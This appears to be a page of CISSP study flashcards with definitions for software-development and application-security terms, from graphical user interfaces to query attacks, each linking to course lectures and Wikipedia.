A user interface using visual elements for interaction, making systems user-friendly for non-technical users. ## Footnote A type of user interface that uses visual elements, such as icons and menus, to interact with a computer or device. It is used to make computer systems more user-friendly and intuitive, especially for non-technical users. Examples include using a GUI to access and manage files on a computer or to navigate and control a smartphone or tablet. *For more information, view this lecture on [Secure Communications - Part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/29462724-secure-communications-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Graphical_user_interface).*

Answer 65

A database organizing data into a tree structure, efficient for storing hierarchical data like organizational charts. ## Footnote A type of database that organizes data into a tree-like structure, with each record in the database having a single parent record and potentially multiple child records. It is commonly used in applications that need to store and retrieve hierarchical data, such as an organizational chart or a family tree. Examples include storing employee data in a hierarchical database to easily track reporting relationships or using a hierarchical database to store and retrieve genealogical data. *For more information, view this lecture on [Databases - part 3](https://courses.thorteaches.com/courses/take/cissp/lessons/36620227-databases-part-3). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Hierarchical_database_model).*

Answer 66

Programming languages with abstract syntax closer to human language, like Python and Java, used for complex programs. ## Footnote Programming languages that use a more abstract and human-readable syntax, as opposed to low-level languages that use machine-readable instructions. They are commonly used by software developers to write complex programs or applications, as they are easier to read and understand than low-level languages. Examples include popular high-level languages such as Python, Java, and C++. *For more information, view this lecture on [Programming Concepts - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/High-level_programming_language).*

Answer 67

Putting plans or decisions into effect, often involving configuration and integration of hardware or software. ## Footnote The process of putting a plan or decision into effect, often involving the setup, configuration, and integration of hardware, software, or protocols. In the context of security, implementation could involve the application of a new policy, the installation of a new security system, or the enforcement of a security standard across an organization. Proper implementation is crucial to ensure the effectiveness of security measures and minimize potential vulnerabilities. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Implementation#Information_technology).*

Answer 68

Evaluating a project during and after implementation to ensure security measures are effective and updated. ## Footnote The critical examination of a project or system at different stages of its life cycle, specifically during and after the implementation phase. The goal is to evaluate the project's adherence to planned specifications, assess the quality of work, and identify potential issues. In security-related projects, these reviews help ensure that the security measures are correctly implemented, effective, and updated to meet evolving threats and standards.

Answer 69

A type of cyber-attack involving the insertion of malicious code into a system to gain unauthorized access or control. ## Footnote A type of cyber-attack that involves injecting malicious code into a system or application to gain access or control. It is used in cyber security to identify and prevent attackers from injecting malicious code into a system or application. Examples -SQL injection, cross-site scripting, and command injection. *For more information, view this lecture on [OWASP 2021 - part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182115-owasp-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Code_injection).*

Answer 70

The verification of user-submitted data to prevent errors or vulnerabilities such as SQL injection and cross-site scripting. ## Footnote The process of checking and verifying user input to ensure it is in the correct format and meets the specified criteria. It is used in computer programming and system administration to prevent errors and unauthorized access. Examples -data type checking, range checking, and regex matching. *For more information, view this lecture on [OWASP 2021 - part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182128-owasp-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_validation).*

Answer 71

Data received and produced by a system or process, important for identifying correct and secure data handling. ## Footnote The inputs and outputs of a system or process refer to the data that is received and processed and the resulting output. It is used in computer programming and system design to define the inputs and outputs of a system or process. Examples -user input, system output, and error messages. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Input/output).*

Answer 72

A vulnerability that occurs when direct access to objects in an application is not securely protected. ## Footnote Insecure Direct Object References (IDOR) occur when an application provides direct access to objects based on user-supplied input. This vulnerability allows attackers to bypass authorization and access resources within the system by manipulating reference values. IDOR can lead to unauthorized data exposure, data modification, or execution of operations with objects such as files, database keys, or URLs. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Insecure_direct_object_reference).*

Answer 73

An insecure direct object reference (IDOR) happens when an application exposes internal references (e.g., database IDs) to unauthorized users, enabling them to access or manipulate data. ## Footnote Attackers can exploit predictable resource names or keys to retrieve or modify records that are supposed to be restricted. For example, changing a userID in a URL could reveal another user’s details. Preventing IDOR involves enforcing proper authorization checks, obfuscating references, and validating each request. Safeguarding object references is key to protecting sensitive data and preventing privilege escalation. *For more information, view this lecture on [OWASP 2021 - part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182128-owasp-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Insecure_direct_object_reference).*

Answer 74

The collection of commands a processor can execute, defining its capabilities and how it interacts with software. ## Footnote The set of instructions that a computer or processor can execute. It is used in computer architecture and programming to define the capabilities and limitations of a system or processor. Examples -arithmetic and logical operations, memory access, and control flow. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Instruction_set).*

Answer 75

A software suite providing comprehensive tools for software development and debugging. ## Footnote A software application that provides a comprehensive set of tools for developing, debugging, and testing software. An IDE typically includes a code editor, a debugger, and other tools for building and managing software projects. Examples of IDEs include Visual Studio, Eclipse, and Xcode. *For more information, view this lecture on [Software vulnerabilities and Attacks](https://courses.thorteaches.com/courses/take/cissp/lessons/19182134-software-vulnerabilities-and-attacks). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Integrated_development_environment).*

Answer 76

A document specifying how different systems or components will communicate. ## Footnote A document that specifies the rules, protocols, and procedures for the communication between two systems, devices, or components. It is used in software development, project management, and system integration. Examples of interface control documents include a communication protocol specification, a system integration plan, and a data exchange agreement. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Interface_Control_Document).*

Answer 77

A low-level, abstract code generated by a compiler as part of the processing before machine code. ## Footnote Intermediate code, also known as intermediate language or bytecode, is a low-level, abstract code that a compiler generates from source code as an intermediary step before machine code. It allows for optimization and can be executed by a virtual machine, aiding in cross-platform compatibility. For example, Java compilers convert source code into Java bytecode, which the Java Virtual Machine (JVM) can execute on any platform. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Intermediate_representation).*

Answer 78

Software that executes source code line by line, translating it into executable instructions. ## Footnote Interpreters are software components that execute source code line by line, translating it into machine-executable instructions in real-time rather than compiling the code into machine language beforehand. This allows for immediate program execution but can result in slower performance compared to compiled languages. They are essential for scripting languages like Python, Ruby, and JavaScript. *For more information, view this lecture on [Programming Concepts - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Interpreter_(computing)).*

Answer 79

A security vulnerability allowing attackers to redirect users to malicious sites or steal sensitive information. ## Footnote A security flaw that allows attackers to redirect users to malicious websites or steal sensitive information. It is used in web application security to prevent attackers from manipulating URLs and redirecting users to malicious sites. Examples include a phishing attack that uses a fake login page to steal user credentials or a ransomware attack that redirects users to a malicious website. *For more information, view this lecture on [OWASP 2021 - part 4](https://courses.thorteaches.com/courses/take/cissp/lessons/29670704-owasp-part-4).*

Answer 80

A systematic approach synchronizing product and process development for optimal performance. ## Footnote Integrated Product and Process Development (IPPD) is a systematic approach that synchronizes the development of products and their related processes to ensure optimal performance, cost-efficiency, and customer satisfaction. By fostering collaboration across diverse functional teams and integrating security considerations early on, IPPD aims to deliver high-quality products that meet stakeholder needs within the IT and cybersecurity domains.

Answer 81

Software designed for specific tasks or functions, such as data processing or workflow management. ## Footnote An IT application refers to any software designed to fulfill specific functions for the user, such as data processing, communication, or workflow management. These applications vary widely in complexity and purpose, from office productivity suites to complex database management systems. Effective security and regular updates are vital to protect against vulnerabilities and ensure data integrity. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Application_software).*

Answer 82

Small programs once used within web browsers for interactive features, now largely replaced by modern web technologies. ## Footnote Java applets were small Java programs that could run in a web browser to provide interactive features on web pages. However, due to security concerns and the rise of alternative technologies, applets have become largely obsolete and are no longer supported by most web browsers. Modern web development practices utilize alternative technologies like HTML5, JavaScript, and WebAssembly for embedding interactive content. *For more information, view this lecture on [Web architecture and attacks](https://courses.thorteaches.com/courses/take/cissp/lessons/19148725-web-architecture-and-attacks). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Java_applet).*

Answer 83

A protocol for launching Java applets and applications from a web page, enabling them to run on a user's computer with security measures. ## Footnote A protocol that is used to launch Java applets and applications from a web page. It allows the applet or application to be downloaded and run on the user's computer, while also providing security measures to protect the user's system from malicious code. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Java_Web_Start#Java_Network_Launching_Protocol_(JNLP)).*

Answer 84

A programming language for adding interactivity and dynamic content to websites, executed by the web browser. ## Footnote A programming language used to create interactive and dynamic content on websites. It is executed by the web browser and allows for user input and real-time updates on a web page. It is used in web development and front-end web programming. Examples include a search bar or a form on a website. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/JavaScript).*

Answer 85

JSON is a lightweight, human-readable data format commonly used for transferring information between web servers and clients, known for its simplicity and language independence. ## Footnote Structured as key-value pairs and arrays, JSON relies on text-based syntax derived from JavaScript. Popular across REST APIs, it replaces more verbose XML in many applications, enabling efficient data exchange. Security considerations include preventing JSON injection attacks and properly validating inputs. With broad support in numerous programming languages, JSON remains a standard for quick, interoperable communication in modern development. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/JSON).*

Answer 86

An attack exploiting web application vulnerabilities to manipulate LDAP queries and compromise directory services. ## Footnote An LDAP Injection Attack is a cyber-attack technique that exploits vulnerabilities in web applications that construct LDAP (Lightweight Directory Access Protocol) statements from user input without proper sanitization. Attackers can manipulate these queries to execute unauthorized commands or modify directory content. Measures such as input validation and prepared statements help protect against such attacks. *For more information, view this lecture on [OWASP 2021 - part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182128-owasp-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/LDAP_injection).*

Answer 87

Collections of pre-written code that can be used to develop new software applications, such as API libraries or UI component libraries. ## Footnote A collection of reusable software components that can be used to build or extend applications. It is used to improve the efficiency and maintainability of software development. Examples of software libraries include the Java API, the .NET Framework, and the Standard Template Library. *For more information, view this lecture on [SCA - Software Composition Analysis](https://courses.thorteaches.com/courses/take/cissp/lessons/54399265-new-2024-sca-software-composition-analysis). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Library_(computing)).*

Answer 88

A contract outlining terms under which software can be used, specifying usage rights and restrictions. ## Footnote A contract between a software vendor and a user that specifies the terms and conditions for using the software. It is used to protect the intellectual property rights of the software vendor and ensure that the user complies with the specified terms and conditions. Examples include open-source and proprietary licensing agreements. *For more information, view this lecture on [Buying software from other companies](https://courses.thorteaches.com/courses/take/cissp/lessons/19182140-buying-software-from-other-companies). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_license_agreement).*

Answer 89

Programming languages closer to machine code, providing direct hardware control. ## Footnote A class of programming languages that are closer to machine code or assembly language than to high-level programming languages. Lower-order languages provide limited abstraction from the hardware and are often used for tasks that require direct hardware manipulation or high performance. They give the programmer more control over the memory and processor but require a deeper understanding of the underlying computer architecture. Examples of lower-order languages include assembly language and machine language, which consist of instructions that are directly executed by the CPU. These languages are generally more difficult to write and maintain than higher-level languages, but they can offer greater efficiency and are essential for certain low-level programming tasks. *For more information, view this lecture on [Programming Concepts - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1).*

Answer 90

The native code understood by computer processors, used for low-level programming tasks. ## Footnote A set of instructions that a computer can execute directly without the need for translation. It is used in computer programming to write low-level code that can be run efficiently on a specific type of processor. Examples include x86 machine language for Intel-based processors and ARM machine language for ARM-based processors. *For more information, view this lecture on [Programming Concepts - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Machine_code).*

Answer 91

AI technology using algorithms to learn and adapt without explicit programming. ## Footnote A type of artificial intelligence that involves the use of algorithms and statistical models to enable computers to improve their performance on a specific task without being explicitly programmed. It is used in a variety of industries, such as finance, healthcare, and retail, to improve decision-making and automate processes. For example, a credit card company may use machine learning to detect fraudulent transactions. *For more information, view this lecture on [Artificial Intelligence (AI)](https://courses.thorteaches.com/courses/take/cissp/lessons/19182149-artificial-intelligence-ai). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Machine_learning).*

Answer 92

A feature built into software for maintenance tasks, potentially posing a security risk if misused. ## Footnote A maintenance hook, traditionally known as a backdoor, is a method intentionally built into software by its creators that allows for direct access to perform administrative or maintenance tasks. While often used legitimately by developers or support teams, these can be considered security risks if discovered by attackers, as they may be exploited to gain unauthorized access to software or systems.

Answer 93

Software that acts as an intermediary between different applications, facilitating communication and data management. ## Footnote A layer of software that facilitates communication and data management between different applications or components within a system. This software 'glue' enables interaction between disparate systems, acting as a bridge across different databases, networks, operating systems, or programming languages. In a secure environment, middleware must be properly configured and updated to prevent it from becoming a potential vulnerability or entry point for unauthorized access. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Middleware).*

Answer 94

Pre-written code collections in low-level languages providing operations and functions for other software or applications. ## Footnote Collections of subroutines or classes typically written in a low-level language like C or C++ that provide a set of functions to perform a specific set of operations or compute tasks. They are directly compiled into machine code for the platform they are developed on, hence the term 'native'. They can be used by high-level languages or applications on the same platform for better performance or to access low-level resources.

Answer 95

An approach for representing complex data relationships, now largely replaced by relational or non-relational models. ## Footnote The Network Database Management Model is a flexible approach for modeling complex data relationships where each record can have multiple parent and child relationships. This contrasts with the hierarchical database model, which restricts records to a single parent, allowing for more versatile relationship mapping. However, this term is somewhat obsolete and is now mainly of historical interest, as contemporary databases typically use relational or non-relational models. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Network_database_model).*

Answer 96

Criteria for a system's operation, like performance and security, that describe how it should work. ## Footnote The criteria that judge the operation of a system rather than specific behaviors, typically referring to aspects such as performance, reliability, and security. These factors describe how a system should work rather than what it should do and can be critical to the system's functionality, performance, and overall user satisfaction. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Non-functional_requirement).*

Answer 97

A flexible database that stores data differently from traditional relational databases, used in big data projects. ## Footnote A type of database that does not use a traditional tabular structure to store data. It is used in big data and NoSQL projects to store and process large amounts of data in a flexible, scalable way. Examples include MongoDB, Cassandra, and HBase. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/NoSQL).*

Answer 98

Organizing a database to minimize redundancy and dependency, improving data efficiency. ## Footnote The process of organizing a database to minimize redundancy and dependency. It is used in database design to improve the efficiency and organization of data. Examples include breaking up a large table into smaller, related tables and removing repeating data. *For more information, view this lecture on [Databases - part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182105-databases-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Database_normalization).*

Answer 99

APIs that manage connectivity between internal networks and external services or partners. ## Footnote These APIs enable connectivity between an organization's internal network and external entities, such as third-party services, partners, and customers. North-South API traffic is often subject to intense scrutiny by CISOs, as these APIs expose core business applications to the internet, necessitating stringent security controls to protect against external threats and unauthorized access.

Answer 100

Database systems that store and retrieve data differently than traditional relational databases. ## Footnote A category of database management systems that provides a mechanism for storage and retrieval of data, which is modeled in means other than the tabular relations used in relational databases. NoSQL databases are designed for distributed data stores with large data sets, and for scalable, high-performance operations. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/NoSQL).*

Answer 101

A programming term indicating the absence of a value or a non-existent reference. ## Footnote In programming, null represents the absence of a value or a non-existent reference. In databases, a null value indicates missing or unknown data. It's crucial to handle null values properly to avoid runtime errors and maintain data integrity. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Null).*

Answer 102

A data structure in object-oriented programming encapsulating data and behavior. ## Footnote The fundamental building blocks of applications built using object-oriented programming (OOP) methodologies. They encapsulate data and the methods that operate on this data within a single unit. This approach enhances code reusability and modularity, making applications easier to develop, maintain, and secure. *For more information, view this lecture on [Databases - part 4.](https://courses.thorteaches.com/courses/take/cissp/lessons/36620229-databases-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Object_(computer_science)).*

Answer 103

Compiled program code that can be executed on a specific platform. ## Footnote The compiled version of a program written in a high-level programming language. It is used in software development to create an executable version of a program that can be run on a specific platform. Examples include a .exe file in Windows or a .dmg file on a Mac. *For more information, view this lecture on [Databases - part 4.](https://courses.thorteaches.com/courses/take/cissp/lessons/36620229-databases-part-4). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Object_code).*

Answer 104

A programming approach modeling concepts as objects with data and behavior. ## Footnote A programming paradigm that uses objects to model real-world concepts and processes. It is used in software development to create modular, reusable code and improve the maintainability and extensibility of a system. Examples of object-oriented programming languages include Java and C++. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Object-oriented_programming).*

Answer 105

Using existing objects in new systems to save development time and resources. ## Footnote The practice of using pre-existing objects in a new application or system, rather than creating new ones from scratch. It is commonly used in software development to save time and resources. Examples include using a library of pre-made objects or reusing objects from a previous project.

Answer 106

A database system supporting object storage and manipulation. ## Footnote An object-oriented database (OODB) is a database management system (DBMS) that supports the storage and manipulation of objects as used in object-oriented programming. OODBs are designed to be compatible with the principles of object-oriented programming, allowing for the integration of complex data models with the advantages of database functionality, such as ACID (Atomicity, Consistency, Isolation, Durability) properties. *For more information, view this lecture on [Programming Concepts - Part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). For more information, view this lecture on [Programming Concepts - Part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/36454825-programming-concepts-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Object_database).*

Answer 107

A programming paradigm using objects to represent data and behavior. ## Footnote A programming paradigm that uses objects to model real-world concepts and processes. It is used in software development to create modular, reusable code and improve the maintainability and extensibility of a system. Examples of object-oriented programming languages include Java and C++. *For more information, view this lecture on [Programming Concepts - Part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). For more information, view this lecture on [Programming Concepts - Part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/36454825-programming-concepts-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Object-oriented_programming).*

Answer 108

Developing software using objects, classes, and inheritance. ## Footnote A method of software development where the programming and structuring of code is done using objects, classes, and inheritance. This approach promotes modular design, code reuse, and scalability. It also allows for better representation of real-world entities and relationships, making systems more intuitive and easier to design, develop, test, and maintain. *For more information, view this lecture on [Programming Concepts - Part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). For more information, view this lecture on [Programming Concepts - Part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/36454825-programming-concepts-part-2).*

Answer 109

A database system combining object and relational database features. ## Footnote An Object-Relational Database (ORD) is a database management system that combines features of object-oriented databases and traditional relational databases to support objects, classes, and inheritance in schemas and query language. ORDs enable complex data types and relationships while maintaining the rigorous data organization and querying power of relational systems. *For more information, view this lecture on [Programming Concepts - Part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). For more information, view this lecture on [Programming Concepts - Part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/36454825-programming-concepts-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Object-relational_database).*

Answer 110

Software with publicly available source code for collaborative development. ## Footnote Open source software is characterized by its openly available source code, which can be studied, modified, and distributed by anyone. This collaborative development model promotes innovation, transparency, and rapid problem-solving, often resulting in more secure and adaptable software solutions through community contributions. *For more information, view this lecture on [Programming Concepts - Part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/36454825-programming-concepts-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Open-source_software).*

Answer 111

An organization providing resources on application security, including tools, documentation, and best practices. ## Footnote A not-for-profit entity that provides unbiased, practical information about application security. This project, supported by a community of corporations, educational organizations, and individuals, produces freely available articles, methodologies, documentation, tools, and technologies to help organizations create secure web applications. *For more information, view this lecture on [OWASP 2021 - part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182115-owasp-part-1). For more information, view this lecture on [OWASP 2021 - part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182128-owasp-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/OWASP).*

Answer 112

Software with publicly accessible source code, allowing for inspection, modification, and enhancement by anyone. ## Footnote OSS is software with source code that anyone can inspect, modify, and enhance. It promotes collaboration and sharing since developers can access the source code to improve the software design or fix issues. OSS security depends on community involvement to identify and patch vulnerabilities promptly. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Open-source_software).*

Answer 113

Software no longer supported or updated by its developers, posing security risks. ## Footnote A program or application that's no longer supported or updated by its creators or maintainers. This can pose a serious risk as new vulnerabilities discovered in the software cannot be patched, potentially leaving systems susceptible to exploits. Organizations often replace orphaned software with supported alternatives to mitigate this risk. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Abandonware).*

Answer 114

A cryptographic mode that turns a block cipher into a stream cipher. ## Footnote Output Feedback (OFB) is an encryption mode that transforms a block cipher into a stream cipher by using the previous output to generate a keystream. This method allows encryption of data in smaller increments, enhances error resistance, and minimizes error propagation, making it suitable for various real-time and sequential data encryption tasks. *For more information, view this lecture on [Symmetric encryption- Part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19149624-symmetric-encryption-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#OFB).*

Answer 115

The OWASP Top 10 is a widely recognized list of the most critical web application security risks, guiding developers and security teams in mitigation strategies. ## Footnote Updated by the Open Web Application Security Project, it highlights vulnerabilities such as broken access control, cryptographic failures, and injection flaws. Each entry includes risk factors and best practices for prevention, providing a practical baseline for secure coding. By raising awareness, the OWASP Top 10 helps organizations prioritize fixes, direct training, and improve overall web application defense against emerging threats and common exploits. *For more information, view this lecture on [OWASP 2021 - part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182115-owasp-part-1). For more information, view this lecture on [OWASP 2021 - part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182128-owasp-part-2). Or visit this [Wikipedia page](https://owasp.org/Top10/).*

Answer 116

Programs that compress or encrypt executables to obfuscate code. ## Footnote Packers are software tools used to compress or encrypt executable files, thereby obscuring their code and making reverse engineering more challenging. They are commonly employed to reduce file size or protect proprietary software, though they are also misused by malicious actors to disguise malware and evade detection by security systems. *For more information, view this lecture on [Malware- Part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/18684286-malware-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Executable_compression).*

Answer 117

Checking inputs to a system for correctness and security, preventing vulnerabilities like injection attacks. ## Footnote A security technique that checks the input of a system to ensure that it meets the required format and specifications. It is used to prevent malicious attacks that exploit input vulnerabilities, such as SQL injection and buffer overflows. Examples include input filtering and type checking. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Parameter_validation).*

Answer 118

A technique allowing code to change its characteristics while maintaining its malicious purpose. ## Footnote A technique that allows malicious code or software to change its characteristics while keeping its core purpose intact. This approach helps the code evade detection by security tools that look for specific signatures or patterns. Polymorphism is often used by viruses, worms, and other forms of malware to bypass security measures and persist undetected within a network or system. *For more information, view this lecture on [Malware- Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/18684054-malware-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Polymorphic_code).*

Answer 119

A collection of projects, programs, and operations managed together to achieve strategic objectives. ## Footnote A collection of projects, programs, sub-portfolios, and operations managed as a group to achieve strategic objectives. An organization's technology portfolio can include a range of items such as software applications, hardware, data resources, and network infrastructure. Managing these assets in a portfolio view allows organizations to evaluate their investments comprehensively, prioritize effectively, and make informed decisions based on overall strategic goals. *For more information, view this lecture on [Software development methodologies part 3.](https://courses.thorteaches.com/courses/take/cissp/lessons/36620202-software-development-methodologies-part-3). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/IT_portfolio_management).*

Answer 120

Early versions of a product used for testing and validating features before mass production. ## Footnote A pre-production model refers to early versions of a product, which are created to test and validate design and functionality before full-scale production begins. In software development, it may include alpha or beta versions of a program. In manufacturing, it could be a prototype of a device. These models are essential for identifying potential issues and improving the final product.

Answer 121

A unique identifier distinguishing each record in a database table, ensuring data integrity and efficient retrieval. ## Footnote A unique identifier for a record in a database table. Each table has one primary key, which cannot have null values and must contain unique values. This ensures that each record in a table can be uniquely identified, providing a way to retrieve, update, or delete specific records efficiently. By enforcing uniqueness and integrity, the use of primary keys is vital for maintaining organized and efficient database systems. *For more information, view this lecture on [Databases - part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or view this lecture on [Databases - part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182105-databases-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Primary_key).*

Answer 122

A structured approach for effective project management, emphasizing controlled delivery of projects. ## Footnote PRINCE2 (Projects in a Controlled Environment) is a widely recognized process-based approach for effective project management. It is built upon seven principles, themes, and processes that guide the planning, execution, and closure of projects. PRINCE2 is used across various sectors, ensuring that project delivery is consistent, controlled, and aligned with specified objectives. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/PRINCE2).*

Answer 123

Java applets with additional permissions beyond the security sandbox, allowing greater system interaction. ## Footnote Privileged applets refer to Java applets that are granted additional permissions beyond the strict limitations of the Java security sandbox model. They can interact with the system in ways typical applets cannot, such as reading and writing local files or accessing system resources, provided the user grants the necessary permissions.

Answer 124

A programming paradigm focusing on executing instructions step-by-step to solve problems. ## Footnote A programming paradigm that focuses on the step-by-step execution of a sequence of instructions to solve a problem. It is used in a wide range of programming languages, such as C, Pascal, and Fortran, to create programs that follow a logical sequence of operations. Examples of procedural programming include calculating the area of a rectangle or sorting a list of numbers. *For more information, view this lecture on [Programming Concepts - Part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/36454825-programming-concepts-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Procedural_programming).*

Answer 125

An entity that standardizes project-related governance and facilitates resource sharing. ## Footnote The Program and Project Management Office (PMO) is an organizational structure that standardizes the project-related governance processes and facilitates the sharing of resources, methodologies, tools, and techniques. The responsibilities of a PMO can range from providing project management support functions to direct management of a project. Examples include enterprise PMO, departmental PMO, and IT PMO. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Project_management_office).*

Answer 126

Languages used to create instructions for computers to perform tasks and solve problems. ## Footnote Formal, human-readable languages used to create instructions for a computer to execute. They are used to develop a wide range of applications, from simple scripts to complex software systems. Examples of programming languages include Java, Python, and C++. *For more information, view this lecture on [Programming Concepts - Part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Programming_language).*

Answer 127

A temporary endeavor undertaken to create a unique product, service, or result. ## Footnote A temporary effort that is undertaken to create a unique product, service, or result. It is used in various fields, such as engineering and marketing, to achieve specific objectives within a specified timeframe and budget. Examples include building a bridge, launching a new product, and organizing a conference. *For more information, view this lecture on [Software development methodologies part 3.](https://courses.thorteaches.com/courses/take/cissp/lessons/36620202-software-development-methodologies-part-3). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Project).*

Answer 128

A collection of projects managed at an organizational level to align with strategic goals. ## Footnote A collection of projects that are aligned with an organization's strategic goals and objectives. It is used to prioritize, allocate resources, and monitor the progress of projects. Examples include a portfolio of IT projects, a portfolio of construction projects, and a portfolio of marketing projects. *For more information, view this lecture on [Software development methodologies part 3.](https://courses.thorteaches.com/courses/take/cissp/lessons/36620202-software-development-methodologies-part-3). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Project_portfolio_management).*

Answer 129

A group of individuals collaborating to achieve the objectives of a specific project. ## Footnote A group of individuals who are responsible for completing a specific project within an organization. It is used to bring together the necessary expertise and skills to achieve project goals. Examples include software development teams, construction teams, and marketing teams.

Answer 130

Creating preliminary versions of products or systems to test and refine their design and functionality. ## Footnote The process of creating a preliminary or working model of a product or system for the purpose of testing and evaluating its design and functionality. This is commonly used in the development of software and hardware products to ensure that the final product meets the desired specifications and requirements. Examples include paper prototypes and beta versions of software products. *For more information, view this lecture on [Software development methodologies part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182096-software-development-methodologies-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Software_prototyping).*

Answer 131

Software that is not copyrighted and freely available for use and modification by anyone. ## Footnote Software that is not protected by copyright and is freely available for use, modification, and distribution by anyone. Public domain software enables innovation and collaboration without the restrictions typical of licensed software. *For more information, view this lecture on [Programming Concepts - Part 2.](https://courses.thorteaches.com/courses/take/cissp/lessons/36454825-programming-concepts-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Public-domain_software).*

Answer 132

A high-level, interpreted programming language known for its clear syntax, readability, and suitability for a wide range of applications. ## Footnote A high-level, interpreted, and general-purpose programming language. It is used in various fields, such as web development, data science, and automation, to create efficient and scalable programs. Examples of Python applications include web servers, machine learning algorithms, and automation scripts. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Python_(programming_language)).*

Answer 133

Cyber-attacks involving the manipulation of query processes to compromise databases or applications. ## Footnote A category of cyber-attacks that involve the manipulation or exploitation of query processes within databases or applications. Specific examples include SQL injection, where malicious SQL queries are inserted into user input fields to manipulate databases, and DDoS attacks, which may flood a server with excessive network protocol queries to disrupt service.

Answer 134

